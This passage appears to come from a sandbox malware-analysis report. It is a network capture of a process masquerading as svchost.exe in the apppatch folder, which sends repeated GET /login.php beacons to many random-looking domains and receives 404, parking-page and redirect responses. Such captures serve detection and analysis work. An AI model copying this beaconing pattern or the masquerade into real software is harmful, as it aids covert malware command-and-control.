Aug 23, 2024 18:42:12.545572996 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:13.059153080 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:42:12 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:42:13.060755968 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:13.180573940 CEST	744	IN	HTTP/1.1 404 Not Found Server: nginx/1.14.0 (Ubuntu) Date: Fri, 23 Aug 2024 16:42:13 GMT Content-Type: text/html Content-Length: 580 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49716	69.162.80.57	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.617311001 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:13.139326096 CEST	362	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Fri, 23 Aug 2024 16:42:12 GMT location: http://ww1.lysyfyj.com server: nginx set-cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098; path=/; domain=.lysyfyj.com; expires=Wed, 10 Sep 2092 19:56:20 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49717	172.234.222.143	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.843050003 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49718	91.195.240.19	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:12.855525970 CEST	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:13.792450905 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:42:13 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Fri, 23 Aug 2024 16:42:13 GMT x-cache-miss-from: parking-89b87dbbb-mhmxq server: Parking/1.0 Data Raw: 33 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 309<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
Aug 23, 2024 18:42:13.792463064 CEST	224	IN	Data Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/570png" href="//img.sedoparking.com/t
Aug 23, 2024 18:42:13.792474031 CEST	1236	IN	Data Raw: 65 6d 70 6c 61 74 65 73 2f 6c 6f 67 6f 73 2f 73 65 64 6f 5f 6c 6f 67 6f 2e 70 6e 67 22 0a 2f 3e 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 37 2e 30 2e 30 20 7c 20 4d 49 54 20 4c 69 63 Data Ascii: emplates/logos/sedo_logo.png"/><style> /! normalize.css v7.0.0 \| MIT License \| github.com/necolas/normalize.css /html{line-height:1.15;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,footer,header
Aug 23, 2024 18:42:13.792493105 CEST	1236	IN	Data Raw: 6d 6c 20 5b 74 79 70 65 3d 62 75 74 74 6f 6e 5d 2c 5b 74 79 70 65 3d 72 65 73 65 74 5d 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 7b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 62 75 74 74 6f 6e 7d 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a Data Ascii: ml [type=button],[type=reset],[type=submit]{-webkit-appearance:button}button::-moz-focus-inner,[type=button]::-mozAEC-focus-inner,[type=reset]::-moz-focus-inner,[type=submit]::-moz-focus-inner{border-style:none;padding:0}button:-moz-focusr
Aug 23, 2024 18:42:13.792543888 CEST	448	IN	Data Raw: 64 65 72 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 38 34 38 34 38 Data Ascii: der{margin:0 auto 0 auto;text-align:center}.container-header__content{color:#848484}.container-buybox{text-align:center}.container-buybox__content-buybox{display:inline-block;text-align:left}.container-buybox__content-heading{font-size:15px}.c
Aug 23, 2024 18:42:13.792555094 CEST	1236	IN	Data Raw: 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 2c 73 Data Ascii: lign:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0 none}.container-se
Aug 23, 2024 18:42:13.792563915 CEST	1236	IN	Data Raw: 36 33 41 0d 0a 65 3a 31 32 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 35 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e Data Ascii: 63Ae:12px;padding-top:15px;padding-bottom:15px}.container-cookie-message__content-text{color:#fff}.container-cookie-message__content-text{margin-left:15%;margin-right:15%}.container-cookie-message__content-interactive{text-align:left;margin:
Aug 23, 2024 18:42:13.792577028 CEST	1236	IN	Data Raw: 65 20 74 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 35 70 78 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 5f 5f 63 6f 6e 74 65 6e 74 2d 6e 65 63 65 73 73 61 72 79 2d 63 6f 6f 6b 69 65 73 2d 72 6f 77 7b 62 61 63 6b 67 72 6f Data Ascii: e td{padding-left:15px}.cookie-modal-window__content-necessary-cookies-row{background-color:#dee1e3}.disabled{display:none;z-index:-999}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-dec
Aug 23, 2024 18:42:13.792625904 CEST	1236	IN	Data Raw: 6f 6d 3a 30 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 61 36 32 36 38 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 7d 2e 73 77 69 74 63 68 5f 5f 73 6c 69 64 65 Data Ascii: om:0;background-color:#5a6268;-webkit-transition:.4s;transition:.4s}.switch__slider:before{position:absolute;content:"";height:26px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--rou
Aug 23, 2024 18:42:13.792638063 CEST	1236	IN	Data Raw: 69 67 68 74 3a 37 30 30 70 78 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 77 65 62 61 72 63 68 69 76 65 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 2e 35 25 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 68 65 61 64 Data Ascii: ight:700px}.container-content__webarchive{margin-top:4.5%}.container-content__header{color:#848484;font-size:15px;margin:0}.container-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center
Aug 23, 2024 18:42:13.792680979 CEST	1236	IN	Data Raw: 70 78 20 30 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 69 6d 61 67 65 7b 63 6f 6e 74 65 6e 74 3a 75 72 6c 28 22 2f 2f 69 6d Data Ascii: px 0;display:inline-block}.two-tier-ads-list__list-element-image{content:url("//img.sedoparking.com/templates/images/bullet_justads.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-l
Aug 23, 2024 18:42:13.793175936 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:42:13 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Fri, 23 Aug 2024 16:42:13 GMT x-cache-miss-from: parking-89b87dbbb-mhmxq server: Parking/1.0 Data Raw: 33 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 309<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49719	154.212.231.82	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:13.341821909 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:14.285836935 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:42:14 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:42:14.326061010 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:14.726733923 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:42:14 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49720	208.91.196.145	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:42:13.356463909 CEST	318	OUT	GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww1.lysyfyj.com Connection: Keep-Alive Cookie: sid=a5fae49c-616e-11ef-add0-e1f04491a098 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:42:14.001137018 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 23 Aug 2024 16:42:13 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") Set-Cookie: vsid=917vr47197693387634658; expires=Wed, 22-Aug-2029 16:42:13 GMT; Max-Age=157680000; path=/; domain=ww1.lysyfyj.com; HttpOnly X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_QxSmw6RcvjLET9dXUu4diAwDxJRMRhwu5JrKgGGNNluOe+8v6fp9Vrb8zF67AKMkxTjy4Ml2VYDQeupqs/Ba9Q== Content-Length: 2166 Keep-Alive: timeout=5, max=109 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 2d 2d 0d 0a 09 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 3d 22 68 74 74 70 3a 2f 2f 77 77 31 2e 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 3f 66 70 3d 5a 62 53 72 76 32 69 31 38 59 6e 4e 66 50 4e 53 71 53 73 43 36 6e 30 6a 51 4c 76 63 44 50 42 79 36 35 68 4b 72 59 63 56 65 5a 64 79 4f 6b 35 35 4e 6b 4d 6d 55 52 44 75 6a 4c 66 59 72 7a 45 4d 7a 35 42 45 35 51 6d 51 4e 65 69 51 48 61 64 6d 59 30 77 25 32 42 25 32 42 56 66 70 65 75 6c 70 41 56 58 47 51 4b 47 4c 54 38 41 37 54 37 64 7a 32 59 70 4d 63 31 4a 66 42 33 42 4b 6d 73 5a 75 49 77 76 65 6a 6b 56 51 7a 39 47 66 46 68 4e 59 41 48 30 63 42 46 46 34 4b 49 44 32 43 37 4d 38 52 45 77 78 79 77 Data Ascii: 